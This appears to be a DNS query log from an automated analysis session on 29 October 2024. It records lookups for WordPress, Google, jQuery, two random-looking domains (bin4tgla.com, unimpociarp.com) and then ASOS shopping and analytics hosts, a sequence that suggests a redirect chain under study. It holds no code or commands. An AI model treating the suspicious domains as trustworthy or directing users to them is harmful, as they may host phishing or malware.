                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.558465958 CET1.1.1.1192.168.2.160xefb0No error (0)lb.wordpress.com192.0.78.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.558465958 CET1.1.1.1192.168.2.160xefb0No error (0)lb.wordpress.com192.0.78.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:41.558845043 CET1.1.1.1192.168.2.160xd6adNo error (0)fqr44.wordpress.comlb.wordpress.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.329476118 CET1.1.1.1192.168.2.160xebc2No error (0)fqr44.wordpress.comlb.wordpress.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.329476118 CET1.1.1.1192.168.2.160xebc2No error (0)lb.wordpress.com192.0.78.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.329476118 CET1.1.1.1192.168.2.160xebc2No error (0)lb.wordpress.com192.0.78.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.345087051 CET1.1.1.1192.168.2.160xadb2No error (0)fqr44.wordpress.comlb.wordpress.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.350300074 CET1.1.1.1192.168.2.160x3db3No error (0)s0.wp.com192.0.77.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.354583025 CET1.1.1.1192.168.2.160xa622No error (0)stats.wp.com192.0.76.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.368772984 CET1.1.1.1192.168.2.160xa5bcNo error (0)fonts.wp.com192.0.77.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.416893959 CET1.1.1.1192.168.2.160x2187No error (0)0.gravatar.com192.0.73.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.063481092 CET1.1.1.1192.168.2.160xde21No error (0)s2.wp.com192.0.77.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.097740889 CET1.1.1.1192.168.2.160x75fNo error (0)s1.wp.com192.0.77.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.212737083 CET1.1.1.1192.168.2.160x1f70No error (0)stats.wp.com192.0.76.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.220758915 CET1.1.1.1192.168.2.160x4678No error (0)pixel.wp.com192.0.76.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.037976980 CET1.1.1.1192.168.2.160x18a0No error (0)pixel.wp.com192.0.76.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.253452063 CET1.1.1.1192.168.2.160x678aNo error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:44.253952980 CET1.1.1.1192.168.2.160xaf51No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.948972940 CET1.1.1.1192.168.2.160x6ac0No error (0)usqe.bin4tgla.com104.21.85.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:55.948972940 CET1.1.1.1192.168.2.160x6ac0No error (0)usqe.bin4tgla.com172.67.204.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:56.343012094 CET1.1.1.1192.168.2.160x1674No error (0)usqe.bin4tgla.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.120419025 CET1.1.1.1192.168.2.160x647bNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.120419025 CET1.1.1.1192.168.2.160x647bNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.120419025 CET1.1.1.1192.168.2.160x647bNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.120419025 CET1.1.1.1192.168.2.160x647bNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.120532036 CET1.1.1.1192.168.2.160x270aNo error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:57.120543957 CET1.1.1.1192.168.2.160xba35No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.290477991 CET1.1.1.1192.168.2.160x2360No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.290894032 CET1.1.1.1192.168.2.160x2d8bNo error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.518651009 CET1.1.1.1192.168.2.160xc68dNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.518651009 CET1.1.1.1192.168.2.160xc68dNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.518651009 CET1.1.1.1192.168.2.160xc68dNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:58.518651009 CET1.1.1.1192.168.2.160xc68dNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.451257944 CET1.1.1.1192.168.2.160xbc1eNo error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.451379061 CET1.1.1.1192.168.2.160xf22fNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.498347998 CET1.1.1.1192.168.2.160xc72dNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:59.565809011 CET1.1.1.1192.168.2.160xba3bNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:59.566344023 CET1.1.1.1192.168.2.160x81d1No error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.598484993 CET1.1.1.1192.168.2.160xd3aaNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.598506927 CET1.1.1.1192.168.2.160x2748No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.377962112 CET1.1.1.1192.168.2.160xc323No error (0)hib4k6i4e0wuyxupagrlur637pll4b5cys71i1hba1alaqpyfije.unimpociarp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.390043974 CET1.1.1.1192.168.2.160xa2dbNo error (0)hib4k6i4e0wuyxupagrlur637pll4b5cys71i1hba1alaqpyfije.unimpociarp.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:14.390043974 CET1.1.1.1192.168.2.160xa2dbNo error (0)hib4k6i4e0wuyxupagrlur637pll4b5cys71i1hba1alaqpyfije.unimpociarp.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.522378922 CET1.1.1.1192.168.2.160xfc88No error (0)www.asos.comsnir.www.asos.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.522763014 CET1.1.1.1192.168.2.160x7876No error (0)www.asos.comsnir.www.asos.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.553026915 CET1.1.1.1192.168.2.160x472cNo error (0)hib4k6i4e0wuyxupagrlur637pll4b5cys71i1hba1alaqpyfije.unimpociarp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.795748949 CET1.1.1.1192.168.2.160xeed1No error (0)hib4k6i4e0wuyxupagrlur637pll4b5cys71i1hba1alaqpyfije.unimpociarp.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:16.795748949 CET1.1.1.1192.168.2.160xeed1No error (0)hib4k6i4e0wuyxupagrlur637pll4b5cys71i1hba1alaqpyfije.unimpociarp.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.098444939 CET1.1.1.1192.168.2.160x2f53No error (0)content.asos-media.comsnir.asos-media.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.098717928 CET1.1.1.1192.168.2.160x7416No error (0)images.asos-media.comsnir.asos-media.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.099287033 CET1.1.1.1192.168.2.160xb3c3No error (0)content.asos-media.comsnir.asos-media.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.099859953 CET1.1.1.1192.168.2.160xd9d8No error (0)www.asos-video.comwww.asos-video.com.multicdn.cloudinary.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.099859953 CET1.1.1.1192.168.2.160xd9d8No error (0)www.asos-video.com.multicdn.cloudinary.com2-01-49b5-08e7.cdx.cedexis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.099859953 CET1.1.1.1192.168.2.160xd9d8No error (0)s2-cloudinary-pin-sni.map.fastly.net151.101.2.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.099859953 CET1.1.1.1192.168.2.160xd9d8No error (0)s2-cloudinary-pin-sni.map.fastly.net151.101.194.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.099859953 CET1.1.1.1192.168.2.160xd9d8No error (0)s2-cloudinary-pin-sni.map.fastly.net151.101.130.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.099859953 CET1.1.1.1192.168.2.160xd9d8No error (0)s2-cloudinary-pin-sni.map.fastly.net151.101.66.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.100958109 CET1.1.1.1192.168.2.160x694dNo error (0)images.asos-media.comsnir.asos-media.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.104634047 CET1.1.1.1192.168.2.160x7d4dNo error (0)www.asos-video.comwww.asos-video.com.multicdn.cloudinary.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.104634047 CET1.1.1.1192.168.2.160x7d4dNo error (0)www.asos-video.com.multicdn.cloudinary.com2-01-49b5-08e7.cdx.cedexis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.105923891 CET1.1.1.1192.168.2.160xcce2No error (0)assets.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.106113911 CET1.1.1.1192.168.2.160x2689No error (0)assets.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.111393929 CET1.1.1.1192.168.2.160xd8f8No error (0)cdn.optimizely.com104.18.66.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.111393929 CET1.1.1.1192.168.2.160xd8f8No error (0)cdn.optimizely.com104.18.65.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.111546993 CET1.1.1.1192.168.2.160x3ab6No error (0)cdn.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.113410950 CET1.1.1.1192.168.2.160xd88fNo error (0)my.asos.comsnir.www.asos.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.114358902 CET1.1.1.1192.168.2.160x988bNo error (0)my.asos.comsnir.www.asos.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.118655920 CET1.1.1.1192.168.2.160x18e7No error (0)ci.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.119292021 CET1.1.1.1192.168.2.160x8b78No error (0)ci.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.121067047 CET1.1.1.1192.168.2.160xc189No error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:18.122006893 CET1.1.1.1192.168.2.160x787eNo error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:19.228060961 CET1.1.1.1192.168.2.160xbc1fNo error (0)assets.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:19.232039928 CET1.1.1.1192.168.2.160x7ecbNo error (0)assets.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:20.186933041 CET1.1.1.1192.168.2.160x1fc8No error (0)s2.go-mpulse.netip46s2.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:20.186948061 CET1.1.1.1192.168.2.160xf05aNo error (0)s2.go-mpulse.netip46s2.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.416713953 CET1.1.1.1192.168.2.160x9e24No error (0)ci.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.419395924 CET1.1.1.1192.168.2.160xa955No error (0)ci.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.422799110 CET1.1.1.1192.168.2.160x83f8No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.422799110 CET1.1.1.1192.168.2.160x83f8No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.422799110 CET1.1.1.1192.168.2.160x83f8No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.422799110 CET1.1.1.1192.168.2.160x83f8No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.194.45.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.422799110 CET1.1.1.1192.168.2.160x83f8No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com63.32.87.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.422799110 CET1.1.1.1192.168.2.160x83f8No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com108.128.214.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.422799110 CET1.1.1.1192.168.2.160x83f8No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.77.215.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.422799110 CET1.1.1.1192.168.2.160x83f8No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.171.192.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.422799110 CET1.1.1.1192.168.2.160x83f8No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.216.198.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.422799110 CET1.1.1.1192.168.2.160x83f8No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.246.210.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.422799110 CET1.1.1.1192.168.2.160x83f8No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.251.39.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.422960997 CET1.1.1.1192.168.2.160x2c62No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.422960997 CET1.1.1.1192.168.2.160x2c62No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.422960997 CET1.1.1.1192.168.2.160x2c62No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.680391073 CET1.1.1.1192.168.2.160x277cNo error (0)s2.go-mpulse.netip46s2.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.683370113 CET1.1.1.1192.168.2.160xa09cNo error (0)s2.go-mpulse.netip46s2.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.696314096 CET1.1.1.1192.168.2.160x5ec8No error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:22.696337938 CET1.1.1.1192.168.2.160x84d4No error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.806201935 CET1.1.1.1192.168.2.160x6ad6No error (0)creativeassets.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.807080030 CET1.1.1.1192.168.2.160xcebNo error (0)creativeassets.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.826920033 CET1.1.1.1192.168.2.160x51f9No error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:23.827805996 CET1.1.1.1192.168.2.160xec96No error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.271452904 CET1.1.1.1192.168.2.160x1636No error (0)resources.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.274890900 CET1.1.1.1192.168.2.160x9545No error (0)resources.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.619750023 CET1.1.1.1192.168.2.160x7647No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.619750023 CET1.1.1.1192.168.2.160x7647No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.619750023 CET1.1.1.1192.168.2.160x7647No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.619785070 CET1.1.1.1192.168.2.160x1362No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.619785070 CET1.1.1.1192.168.2.160x1362No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.619785070 CET1.1.1.1192.168.2.160x1362No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.619785070 CET1.1.1.1192.168.2.160x1362No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.171.192.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.619785070 CET1.1.1.1192.168.2.160x1362No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.170.25.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.619785070 CET1.1.1.1192.168.2.160x1362No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.254.36.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.619785070 CET1.1.1.1192.168.2.160x1362No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.246.210.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.619785070 CET1.1.1.1192.168.2.160x1362No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com108.128.214.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.619785070 CET1.1.1.1192.168.2.160x1362No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.50.97.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.619785070 CET1.1.1.1192.168.2.160x1362No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.77.215.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.619785070 CET1.1.1.1192.168.2.160x1362No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.241.19.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.631707907 CET1.1.1.1192.168.2.160xeee0No error (0)asos.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.631707907 CET1.1.1.1192.168.2.160xeee0No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.631707907 CET1.1.1.1192.168.2.160xeee0No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.631707907 CET1.1.1.1192.168.2.160xeee0No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.49.181.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.631707907 CET1.1.1.1192.168.2.160xeee0No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.170.25.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.631707907 CET1.1.1.1192.168.2.160xeee0No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com108.128.214.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.631707907 CET1.1.1.1192.168.2.160xeee0No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.171.192.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.631707907 CET1.1.1.1192.168.2.160xeee0No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.241.19.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.631707907 CET1.1.1.1192.168.2.160xeee0No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.229.135.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.631707907 CET1.1.1.1192.168.2.160xeee0No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.77.215.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.631707907 CET1.1.1.1192.168.2.160xeee0No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.18.245.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.632371902 CET1.1.1.1192.168.2.160x7d92No error (0)metrics.asos.comasos.com.ssl.d3.sc.omtrdc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.632371902 CET1.1.1.1192.168.2.160x7d92No error (0)asos.com.ssl.d3.sc.omtrdc.net63.140.62.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.632371902 CET1.1.1.1192.168.2.160x7d92No error (0)asos.com.ssl.d3.sc.omtrdc.net63.140.62.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.632371902 CET1.1.1.1192.168.2.160x7d92No error (0)asos.com.ssl.d3.sc.omtrdc.net63.140.62.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.634248018 CET1.1.1.1192.168.2.160x18b3No error (0)metrics.asos.comasos.com.ssl.d3.sc.omtrdc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.651495934 CET1.1.1.1192.168.2.160x6f35No error (0)asos.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.651495934 CET1.1.1.1192.168.2.160x6f35No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:24.651495934 CET1.1.1.1192.168.2.160x6f35No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.280018091 CET1.1.1.1192.168.2.160x9d71No error (0)creativeassets.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.288695097 CET1.1.1.1192.168.2.160x8f32No error (0)creativeassets.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.392163038 CET1.1.1.1192.168.2.160x1e37No error (0)resources.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.394808054 CET1.1.1.1192.168.2.160x1ce2No error (0)resources.asosservices.comsnir.asosservices.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:25.899822950 CET1.1.1.1192.168.2.160x4340No error (0)metrics.asos.comasos.com.ssl.d3.sc.omtrdc.netCNAME (Canonical name)IN (0x0001)false
